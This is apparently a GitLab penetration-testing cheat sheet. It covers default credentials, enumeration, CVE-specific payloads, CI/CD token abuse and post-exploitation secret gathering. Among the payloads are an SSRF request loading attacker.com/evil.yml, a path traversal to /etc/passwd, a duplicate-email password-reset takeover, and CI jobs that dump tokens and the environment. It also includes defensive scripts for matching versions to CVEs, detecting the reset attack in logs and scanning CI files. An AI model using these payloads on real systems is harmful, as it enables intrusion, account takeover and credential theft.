# GitLab

GitLab security testing - enumeration, common vulnerabilities, and exploitation techniques.

## Default Credentials

```
Username: root
Password: 5iveL!fe

Username: admin  
Password: 5iveL!fe

# Note: GitLab 14.0+ forces password change on first login
```

## Enumeration

### Public Information

```bash
# Check for public projects (even on private instances)
https://gitlab.target.com/explore
https://gitlab.target.com/explore/projects
https://gitlab.target.com/explore/groups
https://gitlab.target.com/explore/snippets

# Search for sensitive content
# Use searchbar for: password, secret, key, token, api_key, credentials

# API endpoints (may leak version info)
https://gitlab.target.com/api/v4/version
https://gitlab.target.com/api/v4/projects
https://gitlab.target.com/api/v4/users
```

### User Enumeration

```bash
# Enumerate users via API
curl https://gitlab.target.com/api/v4/users

# Check user profiles
https://gitlab.target.com/users/admin
https://gitlab.target.com/admin

# Enumerate via response differences
# Valid user: 200 OK with profile
# Invalid user: 404 Not Found
```

### Version Detection

```bash
# Check version (if exposed)
curl https://gitlab.target.com/api/v4/version
curl https://gitlab.target.com/help

# Fingerprint via assets
# Compare JS/CSS hashes with known versions
```
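The version string alone is not useful until it is compared against advisory data. The script below is an added example, not code from the original page: it parses the JSON body returned by `/api/v4/version` and reports which of the CVEs listed under Common Vulnerabilities on this page the instance falls into, using only the affected and fixed versions stated there. The advisory table and the sample JSON are constructed for the example; where the page gives only a range ("10.5 to 13.10.4" for CVE-2021-22214, "16.0" for CVE-2023-2825) the boundaries are an assumption derived from that wording, and the whole 16.0 line is treated as affected, which over-reports rather than under-reports.

```python
import json
import re

# Advisory data as stated on this page: (first affected version or None,
# first fixed release on each backported minor line). Boundaries for the
# two entries given only as ranges are assumptions derived from the page.
ADVISORIES = {
    "CVE-2021-22205": (None, ["13.8.8", "13.9.6", "13.10.3"]),
    "CVE-2021-22214": ("10.5.0", ["13.10.5"]),   # page: "10.5 to 13.10.4"
    "CVE-2023-2825": ("16.0.0", ["16.1.0"]),     # page: "16.0"; whole 16.0 line
    "CVE-2023-7028": (None, ["16.5.6", "16.6.4", "16.7.2"]),
}

# Constructed sample of a GET /api/v4/version body (not a real instance).
SAMPLE_VERSION_JSON = '{"version":"16.6.3-ee","revision":"0000000"}'


def parse_version(v):
    """'16.6.3-ee' -> (16, 6, 3); tolerates the -ee/-ce suffix GitLab appends."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", v)
    if not m:
        raise ValueError(f"unrecognised GitLab version string: {v!r}")
    return tuple(int(x) for x in m.groups())


def is_affected(version, fixed_in, introduced=None):
    """True if `version` falls inside the affected range.

    GitLab backports fixes to several minor lines, so a version on a patched
    minor line is affected only below that line's fix release; a version on
    an older line than every listed fix is affected; a newer line is not.
    """
    v = parse_version(version)
    fixes = sorted(parse_version(f) for f in fixed_in)
    if introduced is not None and v < parse_version(introduced):
        return False
    for f in fixes:
        if v[:2] == f[:2]:          # same major.minor line as a backport
            return v < f
    return v < fixes[0]             # older than every patched line


def affected_cves(version_json):
    """Given the body of GET /api/v4/version, list the CVE ids from
    ADVISORIES that the reported version is affected by."""
    version = json.loads(version_json)["version"]
    return [cve for cve, (intro, fixes) in ADVISORIES.items()
            if is_affected(version, fixes, intro)]


if __name__ == "__main__":
    print(affected_cves(SAMPLE_VERSION_JSON))   # ['CVE-2023-7028']
```

Treat a hit as "patch or verify", not as proof of exploitability; the table only knows the version strings on this page, so extend it from the vendor advisories before relying on it in a real assessment.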

## Common Vulnerabilities

### CVE-2021-22205 (RCE via Image Upload) - Critical

```bash
# Affects GitLab CE/EE < 13.10.3, < 13.9.6, < 13.8.8
# Unauthenticated RCE via a malicious image passed to ExifTool during upload

# Check if vulnerable
curl -s https://gitlab.target.com/users/sign_in | grep -oP 'gitlab_version.*?(\d+\.\d+\.\d+)'

# Exploit - https://github.com/AhmedMohamedDev/CVE-2021-22205
python3 exploit.py -t https://gitlab.target.com -c "id"
```

### CVE-2021-22214 (SSRF)

```bash
# Affects GitLab CE/EE 10.5 to 13.10.4
# SSRF via CI lint API

curl -X POST "https://gitlab.target.com/api/v4/ci/lint" \
  -H "Content-Type: application/json" \
  -d '{"content": "include:\n  remote: http://attacker.com/evil.yml"}'
```

### CVE-2023-2825 (Path Traversal)

```bash
# Affects GitLab CE/EE 16.0
# Unauthenticated path traversal to read files

curl "https://gitlab.target.com/uploads/-/system/personal_snippet/1/secret/../../../../../../../../etc/passwd"
```

### CVE-2023-7028 (Account Takeover)

```bash
# Affects GitLab CE/EE < 16.5.6, < 16.6.4, < 16.7.2
# Password reset to attacker-controlled email

# Exploit via duplicate email parameter
POST /users/password HTTP/1.1
user[email]=victim@target.com&user[email]=attacker@evil.com
```
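On the defensive side of CVE-2023-7028, GitLab's published detection guidance is to look in `gitlab-rails/production_json.log` for POST requests to `/users/password` whose `user[email]` parameter is an array of more than one address. The script below is an added example, not code from the original page or from GitLab: it applies that check to log lines. The sample lines are constructed, and their shape (one JSON object per line with `method`, `path`, `remote_ip` and a `params` list of `{"key","value"}` objects) is an assumption about the log format, so adjust the field names to what your instance actually writes.

```python
import json

# Constructed sample lines shaped like gitlab-rails/production_json.log
# (assumed field layout, not real log data). The second line shows the
# multi-address pattern; the last line is deliberately malformed.
SAMPLE_LOG = """\
{"method":"POST","path":"/users/password","params":[{"key":"authenticity_token","value":"[FILTERED]"},{"key":"user","value":{"email":"alice@example.com"}}],"remote_ip":"203.0.113.10","status":200}
{"method":"POST","path":"/users/password","params":[{"key":"authenticity_token","value":"[FILTERED]"},{"key":"user","value":{"email":["victim@example.com","attacker@example.net"]}}],"remote_ip":"198.51.100.7","status":200}
{"method":"GET","path":"/users/sign_in","params":[],"remote_ip":"203.0.113.10","status":200}
not json at all
"""


def email_param(params):
    """Return the user[email] value from a params list, or None if absent."""
    for p in params:
        if p.get("key") == "user" and isinstance(p.get("value"), dict):
            return p["value"].get("email")
    return None


def find_multi_email_resets(log_text):
    """Flag POST /users/password requests whose user[email] is a list with
    more than one address (the CVE-2023-7028 pattern). Returns one dict per
    suspicious line; a single-address reset is normal traffic and is ignored."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        try:
            entry = json.loads(line)
        except ValueError:
            continue  # skip malformed lines instead of aborting the scan
        if entry.get("method") != "POST" or entry.get("path") != "/users/password":
            continue
        email = email_param(entry.get("params", []))
        if isinstance(email, list) and len(email) > 1:
            findings.append({
                "line": lineno,
                "remote_ip": entry.get("remote_ip"),
                "emails": email,
            })
    return findings


if __name__ == "__main__":
    for f in find_multi_email_resets(SAMPLE_LOG):
        print(f)
```

Any hit should be followed by checking which accounts received reset emails and rotating their credentials; accounts with two-factor authentication enabled still need the second factor to sign in, which is why enforcing 2FA is the usual compensating control while the upgrade is scheduled.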

## CI/CD Pipeline Exploitation

### Secrets in CI Variables

```yaml
# .gitlab-ci.yml - Check for exposed secrets
# Variables often visible in job logs if not masked
# (script: must live under a job name to be valid CI config)

leak-check:
  script:
    - echo $CI_JOB_TOKEN  # May have repo access
    - echo $PRIVATE_TOKEN  # If misconfigured
    - printenv  # Dump all variables
```

### Token Abuse

```bash
# CI_JOB_TOKEN has temporary access to:
# - Clone repositories in the same group
# - Push to container registry
# - Access package registry

# Use stolen CI_JOB_TOKEN
git clone https://gitlab-ci-token:${CI_JOB_TOKEN}@gitlab.target.com/group/repo.git

# Access container registry
docker login -u gitlab-ci-token -p ${CI_JOB_TOKEN} registry.gitlab.target.com
```

### Runner Exploitation

```yaml
# If you can modify .gitlab-ci.yml in any repo:
# 1. Shared runners may access other project secrets
# 2. Shell executors run as gitlab-runner user
# 3. Docker executors may allow container escape

# Malicious CI job
stages:
  - exploit

exploit:
  stage: exploit
  script:
    - cat /etc/passwd
    - env
    - ls -la /home/gitlab-runner/
```
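The job patterns shown under Secrets in CI Variables and Runner Exploitation above are exactly what a reviewer of a merge request that touches `.gitlab-ci.yml` should be looking for. The scanner below is an added example, not code from the original page or from GitLab: it walks a CI file line by line and flags script commands that dump the whole job environment or echo a secret-looking variable. The sample CI file is constructed for the example, and the scanner is a deliberately simple line heuristic (it understands only the `- command` list form under `script:`, `before_script:` and `after_script:`), not a YAML parser.

```python
import re

# Constructed .gitlab-ci.yml for illustration; not from any real project.
SAMPLE_CI = """\
stages:
  - build
  - debug

build:
  stage: build
  script:
    - make all
    - echo "build done"

debug:
  stage: debug
  script:
    - echo $CI_JOB_TOKEN
    - echo $PRIVATE_TOKEN
    - printenv
    - env
    - ls -la /home/gitlab-runner/
"""

# A bare printenv/env/set/export prints every variable the job can see.
DUMP_ALL = re.compile(r"^(printenv\b|(env|set|export)\s*$)")
# $VAR or ${VAR} whose name looks like a credential.
ECHO_SECRET = re.compile(
    r"\$\{?[A-Za-z0-9_]*(TOKEN|SECRET|PASSWORD|PASSWD|KEY|CREDENTIAL)", re.I)
SCRIPT_KEYS = ("script:", "before_script:", "after_script:")


def scan_ci_config(text):
    """Return findings as (line_number, reason, command) tuples."""
    findings = []
    in_script, script_indent = False, 0
    for lineno, raw in enumerate(text.splitlines(), start=1):
        stripped = raw.strip()
        if not stripped or stripped.startswith("#"):
            continue
        indent = len(raw) - len(raw.lstrip())
        if stripped in SCRIPT_KEYS:
            in_script, script_indent = True, indent
            continue
        if in_script and indent <= script_indent:
            in_script = False            # left the script list
        if not in_script or not stripped.startswith("- "):
            continue
        cmd = re.sub(r"\s+#.*$", "", stripped[2:].strip())  # drop trailing comment
        if DUMP_ALL.match(cmd):
            findings.append((lineno, "dumps the whole job environment", cmd))
        elif ECHO_SECRET.search(cmd):
            findings.append((lineno, "prints a secret-looking variable", cmd))
    return findings


if __name__ == "__main__":
    for lineno, reason, cmd in scan_ci_config(SAMPLE_CI):
        print(f"line {lineno}: {reason}: {cmd}")
```

Masking only hides a value in the job log; the secret is still present in the job's environment, so the controls that actually limit exposure are marking variables as protected (available only on protected branches and tags), scoping them to environments, and reviewing pipeline changes from forks and merge requests before they run on a shared runner.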

## GraphQL API Testing

```bash
# Introspection query
curl -X POST https://gitlab.target.com/api/graphql \
  -H "Content-Type: application/json" \
  -d '{"query": "{ __schema { types { name } } }"}'

# Query current user
curl -X POST https://gitlab.target.com/api/graphql \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer TOKEN" \
  -d '{"query": "{ currentUser { username email } }"}'
```

## Post-Exploitation

```bash
# If you have access to GitLab server:

# Database credentials
grep -i password /etc/gitlab/gitlab.rb
cat /var/opt/gitlab/gitlab-rails/etc/database.yml

# Secrets file (for cookie signing, etc.)
cat /etc/gitlab/gitlab-secrets.json

# Rails console (as root)
gitlab-rails console
# Then: User.find_by(username: 'root').password = 'newpassword'

# Backup (contains all data)
ls /var/opt/gitlab/backups/
```

## Tools

```bash
# GitLab enumeration
# https://github.com/AhmedMohamedDev/gitlab-enum
python3 gitlab_enum.py -t https://gitlab.target.com

# CI/CD exploitation
# https://github.com/AhmedMohamedDev/nord-stream
nord-stream -t gitlab -u https://gitlab.target.com -token TOKEN

# General
nuclei -t http/cves/2021/CVE-2021-22205.yaml -u https://gitlab.target.com
```

## Related Topics

* [CI/CD Security](/enumeration/webservices/ci-cd-security.md) - Pipeline attacks
* [SSRF](/enumeration/web/ssrf.md) - GitLab SSRF vulnerabilities
* [Supply Chain](/enumeration/web/supply-chain.md) - Code repository attacks


